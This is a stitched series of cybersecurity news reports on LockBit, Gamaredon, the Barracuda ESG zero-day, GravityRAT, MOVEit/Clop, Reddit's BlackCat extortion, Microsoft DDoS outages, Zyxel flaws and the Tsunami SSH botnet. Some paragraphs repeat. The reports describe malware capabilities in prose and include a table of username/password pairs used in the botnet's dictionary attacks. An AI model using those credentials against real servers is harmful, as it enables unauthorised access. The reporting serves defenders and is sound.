“Because LockBit only reveals the names and leaked data of victims who refuse to pay the primary ransom to decrypt their data, some LockBit victims may never be named or have their exfiltrated data posted on leak sites. As a result, the leak sites reveal a portion of LockBit affiliates’ total victims.” reads the joint advisory. “For these reasons, the leak sites are not a reliable indicator of when LockBit ransomware attacks occurred. The date of data publication on the leak sites may be months after LockBit affiliates actually executed ransomware attacks. Up to the Q1 2023, a total of 1,653 alleged victims were observed on LockBit leak sites”
The report also provides a list of legitimate freeware and open-source tools used by the LockBit affiliates in their ransomware attacks along with a list of commonly observed vulnerabilities and exposures (CVEs) exploited by the threat actors.
The advisory includes recommended mitigation measures to prevent LockBit ransomware attacks.
Russia-linked APT group Gamaredon is using a new toolset in attacks aimed at critical organizations in Ukraine.
The Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa) continues to carry out attacks against entities in Ukraine, including security services, military, and government organizations.
Symantec researchers reported that in some cases, the cyberespionage group remained undetected in the target networks for three months. The threat actors focuses on stealing sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB (Federal Security Service) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power.
Gamaredon has been active since 2014, its activity focus on Ukraine, the group was observed using the multistage backdoor Pteranodon/Pterodo.
Symantec pointed out that the group has repeatedly refreshed its toolset to avoid detection, the researchers discovered new versions of known tools and observed the group using short-lived infrastructure.
The attack chain commences with spear-phishing emails with malicious attachments (.docx, .rar, .sfx (self-extracting archives), .lnk, .hta (HTML smuggling files)) using armed conflicts, criminal proceedings, combating crime, and protection of children, as a lure.
The group recently used new variants of the Pteranodon implant that are distributed using a new PowerShell script.
“Shuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality.” reads the report published by Symantec. “The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.”
The PowerShell script is used in recent attacks first copy itself onto the infected systems and create a shortcut file using an rtk.lnk extension. Then the script uses file names such as “porn_video.rtf.lnk”, “do_not_delete.rtf.lnk”” and “evidence.rtf.lnk” in an attempt to trick individuals into oping the files.
A novelty observed in the recent attacks is the use of a USB propagation malware.
The script also enumerates all drives and copies itself to removable disks – USB drives connected to the system. Threat actors use USB drives for lateral movement, and potentially target air-gapped networks.
In this recent attacks, the APT group was using legitimate services as C&C servers, including the Telegram messaging service and the Telegram’s micro-blogging platform, called Telegraph.
Most of the attacks began in February/March 2023 and threat actors remained undetected in the target networks until May. In some attacks threat actors successfully breached the victims’ human resources departments in an attempt to gather intelligence on the personnel at the various organizations.
The report published by Symantec includes indicators of compromise for the recent attacks.
Experts linked the UNC4841 threat actorbehindthe attacks exploiting the recently patched Barracuda ESG zero-day to China.
Mandiant researchers linked the threat actor UNC4841 behind the attacks that exploited the recently patched Barracuda ESG zero-day vulnerability to China.
“Through the investigation, Mandiant identified a suspected China-nexus actor, currently tracked as UNC4841, targeting a subset of Barracuda ESG appliances to utilize as a vector for espionage, spanning a multitude of regions and sectors.” reads the report published by Mandiant. “Mandiant assesses with high confidence that UNC4841 is an espionage actor behind this wide-ranging campaign in support of the People’s Republic of China.”
At the end of May, the network security solutions provider Barracuda warned customers that some of its Email Security Gateway (ESG) appliances were recently breached by threat actors exploiting a now-patched zero-day vulnerability.
The vulnerability, tracked as CVE-2023-2868, resides in the module for email attachment screening, the issue was discovered on May 19 and the company fixed it with the release of two security patches on May 20 and 21.
The issue could have a significant impact because the impacted Email Security Gateway (ESG) appliances are used by hundreds of thousands of organizations worldwide, including several high-profile businesses.
The vulnerability doesn’t impact other Barracuda products, the company states that its SaaS email security services is not affected by this issue.
The company investigated the flaw and discovered that it was exploited to target a subset of email gateway appliances. The company notified via the ESG user interface the customers whose appliances they believe were impacted.
On May 30, 2023, the vendor provided a Preliminary Summary of Key Findings related to its investigation that includes a timeline of events, Indicators of Compromise (IOCs), and recommended actions for impacted customers.
As per the vendor’s statement, the flaw has been exploited in real-world scenarios, with incidents dating back to October 2022 at the very least.
“Earliest identified evidence of exploitation of CVE-2023-2868 is currently October 2022.” reads the updateprovided by the company.
Threat actors exploited the flaw CVE-2023-2868 to obtain unauthorized access to a subset of ESG appliances. Barracuda, with the support of Mandiant, discovered the issue was exploited to deploy malware on a subset of appliances allowing for persistent backdoor access.
The company confirmed that the CVE-2023-2868 was first exploited in October 2022.
The families of malware employed in the attacks are:
SALTWATER – A malware-laced module for the Barracuda SMTP daemon (bsmtpd) that supports multiple capabilities such as uploading/downloading arbitrary files, executing commands, as well as proxying and tunneling malicious traffic to avoid detection. The backdoor component is constructed by leveraging hooks on the send, recv, and close system calls, comprising a total of five distinct components referred to as “Channels” within the binary.
SEASPY – An x64 ELF persistent backdoor masquerades as a legitimate Barracuda Networks service and posing itself as a PCAP filter, specifically monitoring traffic on port 25 (SMTP). SEASPY also supports backdoor functionality that is activated by a “magic packet”.
SEASIDE is a module written in Lua for bsmtpd, it establishes a reverse shell via SMTP HELO/EHLO commands sent via the malware’s C2 server.
Last week the company published a new statement urging customers to immediately replace the ESG appliances, regardless of patch version level.
“Impacted ESG appliances must be immediately replaced regardless of patch version level. If you have not replaced your appliance after receiving notice in your UI, contact support now ([email protected]).” urges the company. “Barracuda’s remediation recommendation at this time is full replacement of the impacted ESG.”
According to Mandiant, starting as early as October 10, 2022, the UNC4841 group sent spear-phishing emails to victim organizations. The email contained a weaponized attachment crafted to exploit the flaw CVE-2023-2868 to access vulnerable Barracuda ESG appliances.
Once compromised the ESG device, UNC4841 was observed stealing specific data of interest, and in some cases, the attackers used the access to the appliance for lateral movement, or to send mail to other victim appliances. The threat actors also deployed additional tools to maintain a presence on ESG appliances.
“Observed emails contained generic email subject and body content, usually with poor grammar and in some cases still containing placeholder values.” continues the report. “Mandiant assesses UNC4841 likely crafted the body and subject of the message to appear as generic spam in order to be flagged by spam filters or dissuade security analysts from performing a full investigation. Mandiant has observed this tactic utilized by advanced groups exploiting zero-day vulnerabilities in the past.”
Mandiant researchers also reported that the UNC4841 used a rootkit dubbed SandBar, which was in the form of a trojanized network file system kernel module for linux (nfsd_stub.ko). The rootkit relies on hooks to hide processes that begin with a specified name.
“SANDBAR hides the process ID from being displayed when the /proc filesystem is queried. SANDBAR hooks the “iterate_shared” routine of the “file_operations” structure for the /proc filesystem and the subsequent “filldir” callback to hide the process. It appears to be adapted from publicly available rootkit code.” continues the report.
The group also used trojanized versions of several legitimate Barracuda LUA modules, which contain the code to perform various operations when certain email-related events are received by the appliance.
The experts analyzed three trojanized modules that were grouped in two different malware families: SEASPRAY and SKIPJACK.
Most of the attacks observed by Mandiant targeted Americas (55%), followed by EMEA (24%), and APAC (22%). Almost one out of three affected organizations were government agencies, a circumstance that suggests that the attacks were carried out as part of a cyber espionage campaign.
“Mandiant assesses with high confidence that UNC4841 conducted espionage activity in support of the People’s Republic of China. While Mandiant has not attributed this activity to a previously known threat group at this time, we have identified several infrastructure and malware code overlaps that provide us with a high degree of confidence that this is a China-nexus espionage operation.” concludes the report. “Additionally, the targeting, both at the organizational and individual account levels, focused on issues that are high policy priorities for the PRC, particularly in the Asia Pacific region including Taiwan.”
An updated version of the Android remote access trojan GravityRAT can steal WhatsApp backup files and can delete files
ESET researchers discovered an updated version of Android GravityRAT spyware that steals WhatsApp backup files and can delete files. The malware is distributed as the messaging apps BingeChat and Chatico.
MalwareHunterTeam researchers first shared the hash for a GravityRAT sample via a tweet.
GravityRAT was first spotted by Cisco Talos researchers in 2017 who speculate it remained under the radar for at least a couple of years [since 2015].
The GravityRAT malware Access Trojan (RAT) is believed to be the work of Pakistani hacker groups, it was mainly employed in attacks aimed at Indian users.
The BingeChat campaign is still ongoing and is active since August 2022, while the campaign using Chatico is no longer active. The researchers discovered that BingeChat is distributed through a website set up by threat actors to advertise free messaging services. ESET researchers discovered the website bingechat[.]net used to host the sample.
The latest version of GravityRAT can exfiltrate WhatsApp backups while providing legitimate chat functionality based on the open-source OMEMO Instant Messenger app, which is a rebuild of the Android Jabber client Conversations.
The website used to serve the app requires visitors to log in, but researchers didn’t have credentials, and the registration was closed.
“It is most probable that the operators only open registration when they expect a specific victim to visit, possibly with a particular IP address, geolocation, custom URL, or within a specific timeframe. Therefore, we believe that potential victims are highly targeted.” reads the analysis published by ESET.“Considering that downloading the app is conditional on having an account and new account registration was not possible for us, we believe that potential victims were specifically targeted.”
The malware stores data to be exfiltrated in text files on external media and then exfiltrates them to the C2 server before removing it.
“Known to have been active since at least 2015, SpaceCobra has resuscitated GravityRAT to include expanded functionalities to exfiltrate WhatsApp Messenger backups and receive commands from a C&C server to delete files.” concludes ESET that also provided indicators of compromise (IoCs) for this campaign.
Progress Software addressed a third vulnerability impacting its MOVEit Transfer application that could lead to privilege escalation and information disclosure.
Progress Software disclosed a new SQL injection vulnerability impacting its MOVEit Transfer application, it is the third issue fixed by the company after:
“Progress has discovered a vulnerability in MOVEit Transfer that could lead to escalated privileges and potential unauthorized access to the environment.” reads the advisory published by Progress. “If you are a MOVEit Transfer customer, it is extremely important that you take immediate action as noted below in order to help protect your MOVEit Transfer environment.”
To prevent unauthorized access to the installs, the vendor urges customers to immediately apply the following mitigation measures until they are able to apply the June 15th patch (CVE Pending):
1. Disable all HTTP and HTTPs traffic to your MOVEit Transfer environment. Customers have to modify firewall rules to deny HTTP and HTTPs traffic to the software on ports 80 and 443. These settings will have the following drawbacks
Users will not be able to log on to the web UI of their MOVEit Transfer.
MOVEit Automation tasks that use the native MOVEit Transfer host will not work
REST, Java and .NET APIs will not work
MOVEit Transfer add-in for Outlook will not work
Recently Progress has released security updates to address new SQL injection vulnerabilities in the MOVEit Transfer application. An attacker can exploit the SQL injection vulnerabilities in the MOVEit Transfer solution to steal sensitive information
The vulnerabilities were discovered by researchers from the cybersecurity firm Huntress.
The good news is that Progress Software is not aware of attacks in the wild exploiting these vulnerabilities.
Recently another MOVEit software vulnerability, tracked as CVE-2023-34362, made the headlines.
The vulnerability is a SQL injection vulnerability, it can be exploited by an unauthenticated attacker to gain unauthorized access to MOVEit Transfer’s database.
The Clop ransomware gang claims to have hacked hundreds of companies by exploiting the above issue.
Kroll researchers discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit software since 2021.
At the time of this writing, the Clop ransomware group already added 27 companies to the list of victims on its dark web leak site. The group claimed to have compromised the companies by exploiting the zero-day CVE-2023-34362.
The group published the following message on its leak site to clarify the theft of data from government agencies reported by some media:
“WE GOT A LOT OF EMAILS ABOUT GOVERNMENT DATA, WE DON’T HAVE ANY GOVERNMENT DATA AND ANYTHING DIRECTLY RESIDING ON EXPOSED AND BAD PROTECTED NOT ENCRYPTED FILE TRANSFER WE STILL DO THE POLITE THING AND DELETE ALL. ALL MEDIA SPEAKING ABOUT THIS ARE DO WHAT ALWAYS THEY DO. PROVIDE LITTLE TRUTH IN A BIG LIE. WE ALSO WANT TO REMIND ALL COMPANY THAT IF YOU PUT DATA ON INTERNET WHERE DATA IS NOT PROTECT DO NOT BLAME US FOR PENETRATION TESTING SERVICE. WE ARE ONLY FINANCIAL MOTIVATED AND DO NOT CARE ANYTHING ABOUT POLITICS.“
British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group.
Oil and Gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign conducted by the Clop gang exploiting a MOVEit zero-day vulnerability
Threat actors are actively exploiting the zero-day vulnerability, tracked as CVE-2023-34362, to steal data from organizations worldwide.
The company is investigating the security breach and said that at this time the attack had no impact to its core IT systems.
“We are aware of a cyber security incident that has impacted a third-party tool from Progress called MOVEit Transfer, which is used by a small number of Shell employees and customers,” said Shell US spokesperson Anna Arata in a statement. “There is no evidence of impact to Shell’s core IT systems,” Arata added. “Our IT teams are investigating to understand and manage any risks, and take appropriate action, she said.
The Clop ransomware gang claims to have hacked hundreds of companies by exploiting the above issue.
Kroll researchers discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit software since 2021.
At the time of this writing, the Clop ransomware group already added 27 companies to the list of victims on its dark web leak site. The group claimed to have compromised the companies by exploiting the zero-day CVE-2023-34362.
The group published the following message on its leak site to clarify the theft of data from government agencies reported by some media:
“WE GOT A LOT OF EMAILS ABOUT GOVERNMENT DATA, WE DON’T HAVE ANY GOVERNMENT DATA AND ANYTHING DIRECTLY RESIDING ON EXPOSED AND BAD PROTECTED NOT ENCRYPTED FILE TRANSFER WE STILL DO THE POLITE THING AND DELETE ALL. ALL MEDIA SPEAKING ABOUT THIS ARE DO WHAT ALWAYS THEY DO. PROVIDE LITTLE TRUTH IN A BIG LIE. WE ALSO WANT TO REMIND ALL COMPANY THAT IF YOU PUT DATA ON INTERNET WHERE DATA IS NOT PROTECT DO NOT BLAME US FOR PENETRATION TESTING SERVICE. WE ARE ONLY FINANCIAL MOTIVATED AND DO NOT CARE ANYTHING ABOUT POLITICS.“
By May 31, Rapid7 experts discovered approximately 2,500 instances of MOVEit Transfer publicly accessible on the internet, with a significant portion located in the United States. At this time the number of installs located in the UK is 127.
UK’s communications regulator Ofcom is another victim of the ongoing ransomware campaign conducted by the Clop group. Recently another data breach made the headlines, the hack of the payroll services provider Zellis.
The instance of MOVEit Transfer managed by the payroll processor Zellis was used by the company to exchange files with tens of companies, this means that the number of impacted firms could be significant.
As a result of the cyber attack on the payroll provider Zellis, the personal data of employees at the BBC and British Airways has been compromised and exposed.
One of Zellis’s customers, the British health and beauty retailer and pharmacy chain Boots also confirmed to have been impacted by the attack. Another firm impacted by the data breach is the airline Aer Lingus which confirmed that “some of our current and former employee data” has been disclosed.
In March 2021, Shell disclosed another data breach resulting from the compromise of an Accellion File Transfer Appliance (FTA) used by the company.
DoJ charged a Russian national with conspiring to carry out LockBit ransomware attacks against U.S. and foreign businesses.
The Justice Department announced charges against the Russian national Ruslan Magomedovich Astamirov (20) for his role in numerous LockBit ransomware attacks against systems in the United States, Asia, Europe, and Africa. The US authorities arrested the man in Arizona last month
DoJ states that from at least as early as August 2020 to March 2023, Astamirov and other members of the LockBit ransomware gang committed wire fraud and compromised many computer systems worldwide attempting to extort the victims of ransomware attacks.
US authorities believe that Astamirov conducted at least five attacks against victim computer systems in the United States and abroad.
Astamirov controlled multiple email addresses, and IP addresses, and other online provider accounts that were employed in LockBit ransomware attacks. In at least one attack, the authorities were able to trace a portion of a ransom payment to a wallet under the control of Astamirov.
“This LockBit-related arrest, the second in six months, underscores the Justice Department’s unwavering commitment to hold ransomware actors accountable,” said Deputy Attorney General Lisa O. Monaco. “In securing the arrest of a second Russian national affiliated with the LockBit ransomware, the Department has once again demonstrated the long arm of the law. We will continue to use every tool at our disposal to disrupt cybercrime, and while cybercriminals may continue to run, they ultimately cannot hide.”
If convicted, Astamirov faces a maximum penalty of 20 years in prison on a charge with commit wire fraud and a maximum penalty of five years in prison on the charge of conspiring to intentionally damage protected computers and to transmit ransom demands. Both charges can also be punished by a maximum fine of either $250,000 or twice the gain or loss from the offense, whichever is greatest.
In November 2022, the U.S. Department of Justice (DoJ) charged Mikhail Vasiliev, a dual Russian and Canadian national, for his alleged participation in the LockBit ransomware operation.
The man is currently in custody in Canada and is awaiting extradition to the United States.
In May, the US Justice Department charged Russian national Mikhail Pavlovich Matveev (30), aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar, for his alleged role in multiple ransomware attacks.
The DoJ unsealed two indictments charging the man with using three different ransomware families in attacks aimed at numerous victims throughout the United States. The attacks hit law enforcement agencies in Washington, D.C. and New Jersey, as well as organizations in the healthcare and other sectors nationwide.
On or about June 25, 2020, Matveev and his LockBit coconspirators targeted a law enforcement agency in Passaic County, New Jersey. On or about May 27, 2022, the man and his Hive coconspirators allegedly hit a nonprofit behavioral healthcare organization in New Jersey. On April 26, 2021, Matveev and his Babuk coconspirators hit the Metropolitan Police Department in Washington, D.C.
The Russian citizen has been charged with conspiring to transmit ransom demands, conspiring to damage protected computers, and intentionally damaging protected computers. If convicted, the man could face a sentence of over 20 years in prison.
The man is suspected to be living in Russia and is operating from that country. Clearly, due to the ongoing geopolitical crisis, it’s unlikely that Russia will capture the man to extradite him to the United States.
According to a joint advisory published by cybersecurity agencies, the LockBit ransomware group has successfully extorted roughly $91 million in about 1,700 attacks against U.S. organizations since 2020.
The LockBit ransomware operation was the most active in 2022 and according to the researchers it is one of the most prolific RaaS in 2023. The operation targeted many organizations in critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The advisory highlights that due to the large number of unconnected affiliates in RaaS, the TTPs observed in the LockBit ransomware attacks have a significant variance.
Lockbit was responsible for 18% of the total reported Australian ransomware incidents from April 1, 2022, to March 31, 2023.
16% of the State, Local, Tribal, and Tribunal (SLTT) government ransomware incidents reported to the MS-ISAC is 2022 were LockBit attacks. The group targeted municipal governments, county governments, public higher education and K-12 schools, and emergency services (e.g., law enforcement).
Polish police, as part of the international law enforcement operation PowerOFF, dismantled a DDoS-for-hire service that has been active since at least 2013.
An international operation codenamed PowerOff led to the shutdown of a DDoS-for-hire service that has been active since at least 2013. The operation was conducted by the Polish Central Bureau for Combating Cybercrime with the support of Europol, the FBI, and law enforcement agencies from the Netherlands, Germany, and Belgium, and the Joint Cybercrime Action Taskforce (J-CAT).
DDoS-for-hire or ‘booter’ services allows registered users to launch order DDoS attacks without specific knowledge.
Bleeping Computer reported that the Polish police arrested two individuals running the DDoS-for-hire services and collected data from a server in Switzerland used by the perpetrators.
The police carried out 10 searches and seized various electronic equipment, including hard drives, 5 desktop computers and 6 portable computers, 10 telephones, 5 USB sticks and 3 SIM cards, a printout of a cryptocurrency wallet with a private key containing 1 BTC and 1 BCH worth over PLN 114,000. zlotys and money in the amount of over 145 thousand. zloty. The total amount of secured property is almost PLN 260,000. zlotys (more than $63.690)
The researchers at Vx-underground published a video that shows the arrest of the suspects and the searches conducted by the Polish police.
Here is the full video of the Polish CBZC (Central Bureau for Combating Cybercrime) arresting individuals associated with DDoS as a Service providers.
The police discovered that more than 35,000 user accounts were registered to the services, the analysis of the server revealed 76,000 login records and more than 320,000 unique IP addresses linked to the DDoS-for-hire service.
The police also collected evidence of attacks paid by the customers, who totally paid hundreds of thousands of dollars to the platform.
“In the proceedings, data was obtained from the perpetrators’ server located in Switzerland. More than 35,000 have been established. user accounts, 76 thousand. log-in records to the platform and over 320,000 unique IP addresses of the attacked servers. In addition, 11,000 records of purchased “plans” of attack” along with the email address of the buyer of the service (for the total amount of approximately $ 400,000), and over a thousand records of purchased “plans” of attacks (for the total amount of approximately $ 44,000).” reads the press release published by the Polish police.
In early May, the U.S. Justice Department announced the seizure of 13 domains linked to DDoS-for-hire services as part of a coordinated international law enforcement effort known as Operation PowerOFF.
The authorities pointed out that ten of the 13 domains seized as part of Operation PowerOFF are reincarnations of booters that were seized in December. In December 2022, the FBI seized 48 domains linked to DDoS-for-Hire service platforms as part of the same Operation PowerOFF.
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.
Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.
The U.S. government announced up to a $10 million bounty for information linking the Clop ransomware gang to a foreign government.
The US goverment is offering up to a $10 million bounty for information linking CL0P Ransomware Gang or any other threat actors targeting U.S. critical infrastructure to a foreign government.
The bounty is covered by the U.S. State Department’s Rewards for Justice program.
The U.S. State Department’s Rewards for Justice (RFJ) program is a government counterterrorism rewards program that offers monetary rewards for information leading to the prevention, disruption, or conviction of individuals involved in acts against U.S. interests.
The US government offers rewards for information that leads to the arrest, conviction, or location of threat actors.
The Clop ransomware group recently claimed to have hacked hundreds of companies globally by exploiting MOVEit Transfer vulnerability.
MOVEit Transfer is a managed file transfer that is used by enterprises to securely transfer files using SFTP, SCP, and HTTP-based uploads.
The vulnerability is a SQL injection vulnerability, it can be exploited by an unauthenticated attacker to gain unauthorized access to MOVEit Transfer’s database.
The ransomware gang published an extortion note on its dark web leak site claiming to have information on hundreds of businesses.
“WE HAVE INFORMATION ON HUNDREDS OF COMPANIES SO OUR DISCUSSION WILL WORK VERY SIMPLE.” reads the message published by the gang.
The gang urged victim organizations to contact them before their name will be added to the list of victims on the leak site. The group fixed the deadline on June 14.
At this time it is not possible to determine the exact number of organizations that were breached by the gang by exploiting the MOVEit Transfer vulnerability.
By May 31, Rapid7 experts discovered approximately 2,500 instances of MOVEit Transfer publicly accessible on the internet, with a significant portion located in the United States.
“Our teams have so far observed the same webshell name in multiple customer environments, which may indicate automated exploitation.” reported Rapid7.
Kroll researchers discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit software since 2021.
At the time of this writing, the Clop ransomware group already added 27 companies to the list of victims on its dark web leak site. The group claimed to have compromised the companies by exploiting the zero-day CVE-2023-34362.
According to a report published by CNN, the group has breached numerous federal agencies, including The Department of Energy.
After the publication of the report, the group published the following message on its leak site to clarify the theft of data from government agencies reported by some media:
“WE GOT A LOT OF EMAILS ABOUT GOVERNMENT DATA, WE DON’T HAVE ANY GOVERNMENT DATA AND ANYTHING DIRECTLY RESIDING ON EXPOSED AND BAD PROTECTED NOT ENCRYPTED FILE TRANSFER WE STILL DO THE POLITE THING AND DELETE ALL. ALL MEDIA SPEAKING ABOUT THIS ARE DO WHAT ALWAYS THEY DO. PROVIDE LITTLE TRUTH IN A BIG LIE. WE ALSO WANT TO REMIND ALL COMPANY THAT IF YOU PUT DATA ON INTERNET WHERE DATA IS NOT PROTECT DO NOT BLAME US FOR PENETRATION TESTING SERVICE. WE ARE ONLY FINANCIAL MOTIVATED AND DO NOT CARE ANYTHING ABOUT POLITICS.“
The BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from the Reddit in February cyberattack.
In February, the social news aggregation platform Reddit suffered a security breach, attackers gained unauthorized access to internal documents, code, and some business systems.
The company announced it was hit by a sophisticated and highly-targeted attack that took place on February 5, 2023. A highly-targeted phishing attack hit the employees of the company. The company pointed out that Reddit user passwords and accounts were not compromised.
The spear-phishing messages redirected users to a website mimicking the company’s intranet gateway, the landing page was designed to trick victims into providing credentials and second-factor tokens.
“On late (PST) February 5, 2023, we became aware of a sophisticated phishing campaign that targeted Reddit employees. As in most phishing campaigns, the attacker sent out plausible-sounding prompts pointing employees to a website that cloned the behavior of our intranet gateway, in an attempt to steal credentials and second-factor tokens.” reads a notice published by the company.
Once obtained a single employee’s credentials, threat actors gained access to some internal docs, code, as well as some internal dashboards and business systems. The primary production systems of the company were not compromised.
“Exposure included limited contact information for (currently hundreds of) company contacts and employees (current and former), as well as limited advertiser information.” continues the notice.“Based on several days of initial investigation by security, engineering, and data science (and friends!), we have no evidence to suggest that any of your non-public data has been accessed, or that Reddit’s information has been published or distributed online.”
The company states that the phished employee self-reported and launched an internal investigation to determine the extend of the incident. The Security team responded quickly to the incident by locking out the intruders.
Now the BlackCat/ALPHV ransomware gang claimed responsibility for the February cyberattack on the company. The cybercrime gang claims to have stolen 80GB of data (zipped) from Reddit. The group attempted to contact Reddit twice, on April 13 and June 16, without success.
“Operators broke into Reddit on February 5, 2023, and took 80 gigabytes (zipped) of data. Reddit was emailed twice by operators, once on April 13 and one again on June 16. There was no attempt to find out what we took.” reads the messages pubished by the ransomware group on its Tor data leak site. “This is again another instance of Steve Huffman undermining his own agenda. He makes an effort to appear tough, but we are all aware of what happens to individuals like him when businesses go public. such as Adam Neumann of WeWork. I told them in my first email that I would wait for their IPO to come along. But this seems like the perfect opportunity! We are very confident that Reddit will not pay any money for their data. But I am very happy to know that the public will be able to read about all the statistics they track about their users and all the interesting confidential data we took.”
BlackCat/Alphv group is demanding $4.5 million to delete the stolen data.
Did you know they also silently censor users? Along with artifacts from their GitHub! In our last email to them, we stated that we wanted $4.5 million in exchange for the deletion of the data and our silence. As we also stated, if we had to make this public, then we now demand that they also withdraw their API pricing changes along with our money or we will leak it.” continues the message. “We expect to leak the data. Pass on the torch, Spez, you’re no longer cut out for this kind of work.”
Microsoft confirmed that the recent outages to the Azure, Outlook, and OneDrive services were caused by cyber attacks.
In early June, Microsoft suffered severe outages for some of its services, including Outlook email, OneDrive file-sharing apps, and the cloud computing infrastructure Azure.
A collective known as Anonymous Sudan (aka Storm-1359) claimed responsibility for the DDoS attacks that hit the company’s services.
Threat actors relied on access to multiple virtual private servers (VPS) in conjunction with rented cloud infrastructure, open proxies, and DDoS tools.
Initially, the IT giant did not provide details about the outage, but now it has confirmed it was targeted by DDoS attacks in a report titled “Microsoft Response to Layer 7 Distributed Denial of Service (DDoS) Attacks.”
“Beginning in early June 2023, Microsoft identified surges in traffic against some services that temporarily impacted availability. Microsoft promptly opened an investigation and subsequently began tracking ongoing DDoS activity by the threat actor that Microsoft tracks as Storm-1359.” reads the report published by the company.
The attackers launched a series of powerful Layer 7 Distributed Denial of Service (DDoS) attacks.
The company pointed out that they have seen no evidence that customer data has been accessed or compromised. Microsoft enhanced layer 7 protections, including tuning Azure Web Application Firewall (WAF), to mitigate such types of attacks.
The company observed Anonymous Sudan launching several layer 7 DDoS attack traffic types, including HTTP(S) flood attacks, cache bypass, and Slowloris.
The report published by Microsoft also includes Layer 7 DDoS protection tips
Collective Anonymous Sudan has been active since January 2023, it claims to target any country that is against Sudan. However, some security researchers believe that Anonymous Sudan is a sub-group of the Pro-Russian threat group Killnet.
“SpiderLabs cannot confirm that the group is based in Sudan, nor if any of its members are from that nation, but based on the evidence available, it seems quite likely that Anonymous Sudan is a Killnet project, possibly including some Eastern European members.” states SpiderLabs.
Zyxel released security updates to address a critical vulnerability affecting its network-attached storage (NAS) devices.
Zyxel released security updates to address a critical security flaw, tracked as CVE-2023-27992 (CVSS score: 9.8), affecting its network-attached storage (NAS) devices.
The vulnerability is a pre-authentication command injection issue that impacts the Zyxel NAS326 firmware versions prior to V5.21(AAZF.14)C0, NAS540 firmware versions prior to V5.21(AATB.11)C0, and NAS542 firmware versions prior to V5.21(ABAG.11)C0. A remote, unauthenticated attacker can exploit the vulnerability to execute some operating system (OS) commands by sending a specially crafted HTTP request.
“Zyxel has released patches addressing a pre-authentication command injection vulnerability in some NAS versions.” reads the advisory published by Zyxel. “The pre-authentication command injection vulnerability in some Zyxel NAS devices could allow an unauthenticated attacker to execute some operating system (OS) commands remotely by sending a crafted HTTP request,”
The vulnerability was reported by Andrej Zaujec, NCSC-FI, and Maxim Suslov.
Threat actors are actively attempting to exploit the command injection vulnerability CVE-2023-28771 impacting Zyxel firewalls. Their objective is to leverage this vulnerability to deploy and install malware on the affected systems. US CISA added the vulnerability to its Known Exploited Vulnerability to Catalog based on evidence of active exploitation.
In late April, Zyxel addressed the critical vulnerability CVE-2023-28771 (CVSS score 9.8) in its firewall devices. The company promptly advised customers to install the provided patches in order to mitigate the vulnerability.
The vulnerability is being actively exploited to recruit vulnerable devices in a Mirai-like botnet.
The other two issues, tracked as CVE-2023-33009 and CVE-2023-33010, are critical buffer overflow vulnerabilities. A remote, unauthenticated attacker can can trigger the flaws to cause a denial-of-service (DoS) condition and remote code execution on vulnerable devices.
The company states that devices under attack become unresponsive and their Web GUI or SSH management interface are not reachable.
Researchers warn of an ongoing Tsunami DDoS botnet campaign targeting inadequately protected Linux SSH servers.
Researchers from AhnLab Security Emergency response Center (ASEC) have uncovered an ongoing hacking campaign, aimed at poorly protected Linux SSH servers, to install the Tsunami DDoS botnet (aka Kaiten). The threat actors behind these attacks were also observed installing other malware families, including ShellBot, XMRig CoinMiner, and Log Cleaner.
The Tsunami DDoS botnet operates as an IRC bot and relies on IRC for C2 communication.
The researchers pointed out that the source code of the Tsunami bot is publicly available allowing multiple threat actors to create their own botnet. The bot primarily targets IoT devices along with Linux servers with brute force attacks.
The following table contains the list ID and password values used by the bot in the dictionary attacks along with the IP address for the target.
ID
Password
Attack Target
admin
qwe123Q#
124.160.40[.]48
sxit
sxit
124.160.40[.]94
root
abcdefghi
124.160.40[.]94
root
123@abc
124.160.40[.]94
weblogic
123
124.160.40[.]94
rpcuser
rpcuser
124.160.40[.]94
test
p@ssw0rd
124.160.40[.]94
nologin
nologin
124.160.40[.]94
Hadoop
p@ssw0rd
124.160.40[.]94
hxw
test123
124.160.40[.]94
backlog
backlog
124.160.40[.]94
dell
123
124.160.40[.]94
Upon successfully logging in, the attackers execute a command to download and run various malware.
The downloader-type Bash script is used to install additional malware and perform various preliminary tasks to take control of infected systems, including the creation of a backdoor SSH account.
Threat actors also generated a new pair of public/private SSH keys for the compromised server to achieve persistent access, even if the user password was changed.
The variant of the Tsunami bot employed in this campaign is a Kaiten variant known as Ziggy, it maintains persistence by writing itself on the “/etc/rc.local” file.
In order to avoid detection, the bot attempts to change the name of the process that is currently running to “[kworker/0:0]”. Using this threat the malware uses normal process names, making it difficult for users to notice.
The Tsunami botnet supports multiple DDoS attack techniques, including SYN, ACK, UDP, and various flood DDoS methods.
Tsunami also supports multiple commands, including collecting system information, executind shell commands, establishing reverse shells, collecting system information, updating itself, downloading additional payloads, and killing itself.
The attackers also use a privilege escalation malware, it is an ELF malware that set the user ID and group ID as the root account before executing the shell.
“Attack campaigns on poorly managed Linux SSH servers have been occurring persistently for quite some time. The threat actor installed XMRig CoinMiner alongside DDoS bots like Tsunami and ShellBot on infected systems.” concludes the report. “administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks and update to the latest patch to prevent vulnerability attacks. They should also use security programs such as firewalls for servers accessible from outside to restrict access by attackers. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.”
